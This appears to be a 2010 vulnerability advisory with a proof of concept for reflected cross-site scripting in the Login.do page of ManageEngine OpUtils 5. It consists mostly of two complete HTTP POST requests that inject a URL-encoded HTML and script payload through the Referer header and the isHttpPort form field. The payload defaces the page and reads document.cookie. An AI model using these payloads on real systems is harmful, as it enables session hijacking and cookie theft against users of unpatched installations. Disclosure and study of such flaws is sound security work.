ManageEngine OpUtils 5 suffers from multiple cross site scripting vulnerabilities in Login.DO.
959444dffbd02b6f50852d15e6bf3e65ea95d117752d0931f7125a8fc43fc020
================================================================================
ManageEngine OpUtils 5 "Login.DO" Multiple Cross Site Scripting Vulnerabilities
================================================================================
# code by Asheesh kumar Mani Tripathi
# AKS IT Services
# Credit by Asheesh Anaconda
#Download http://www.manageengine.com/products/oputils
#Vulnerbility
ManageEngine OpUtils 5 is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
#Impact
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Example:1
========================================================================================================================
Request
========================================================================================================================
POST /Login.do HTTP/1.1
Host: localhost:7080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://localhost:7080/Login.do%22%3e%3c%62%6f%64%79%3e%3c%68%31%3e%3c%70%3e%3c%61%20%25%36%38%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%73%68%65%65%73%68%32%30%30%30%2e%62%6c%6f%67%73%70%6f%74%2e%63%6f%6d%22%3e%61%6e%61%63%6f%6e%64%61%25%36%45%20%57%61%73%20%48%65%72%65%20%21%21%21%3c%2f%68%31%3e%3c%25%32%46%62%72%3e%58%53%53%20%21%21%21%21%3c%2f%70%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f%63%75%6d%65%25%36%45%74%2e%63%6f%6f%6b%69%65%29%3c%2f%73%63%72%69%70%74%3e%3c%25%32%46%62%6f%64%79%3e
Cookie: JSESSIONID=738A4E8130CBE2A0D5E857D9EBF9820E; 32=temp; 83=temp
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
cookieexists=true&username=asheesh&password=asheesh&logonsubmit=+&log=WARNING&locationUrl=localhost&isHttpPort=false
========================================================================================================================
Response
========================================================================================================================
HTTP/1.1 200 OK
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 03 Feb 2010 15:47:19 GMT
Server: Apache-Coyote/1.1
Content-Length: 20583
Example 2:
========================================================================================================================
Request
========================================================================================================================
POST /Login.do HTTP/1.1
Host: localhost:7080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://localhost:7080/Login.do%22%3e%3c%62%6f%64%79%3e%3c%68%31%3e%3c%70%3e%3c%61%20%25%36%38%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%73%68%65%65%73%68%32%30%30%30%2e%62%6c%6f%67%73%70%6f%74%2e%63%6f%6d%22%3e%61%6e%61%63%6f%6e%64%61%25%36%45%20%57%61%73%20%48%65%72%65%20%21%21%21%3c%2f%68%31%3e%3c%25%32%46%62%72%3e%58%53%53%20%21%21%21%21%3c%2f%70%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f%63%75%6d%65%25%36%45%74%2e%63%6f%6f%6b%69%65%29%3c%2f%73%63%72%69%70%74%3e%3c%25%32%46%62%6f%64%79%3e
Cookie: JSESSIONID=738A4E8130CBE2A0D5E857D9EBF9820E; 32=temp; 83=temp
Content-Type: application/x-www-form-urlencoded
Content-Length: 587
cookieexists=true&username=asheesh&password=asheesh&logonsubmit=+&log=WARNING&locationUrl=localhost&isHttpPort=false%22%3e%3c%62%6f%64%79%3e%3c%68%31%3e%3c%70%3e%3c%61%20%25%36%38%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%73%68%65%65%73%68%32%30%30%30%2e%62%6c%6f%67%73%70%6f%74%2e%63%6f%6d%22%3e%61%6e%61%63%6f%6e%64%61%25%36%45%20%57%61%73%20%48%65%72%65%20%21%21%21%3c%2f%68%31%3e%3c%25%32%46%62%72%3e%58%53%53%20%21%21%21%21%3c%2f%70%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f%63%75%6d%65%25%36%45%74%2e%63%6f%6f%6b%69%65%29%3c%2f%73%63%72%69%70%74%3e%3c%25%32%46%62%6f%64%79%3e
========================================================================================================================
Response
========================================================================================================================
HTTP/1.1 200 OK
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 03 Feb 2010 15:48:20 GMT
Server: Apache-Coyote/1.1
Content-Length: 12436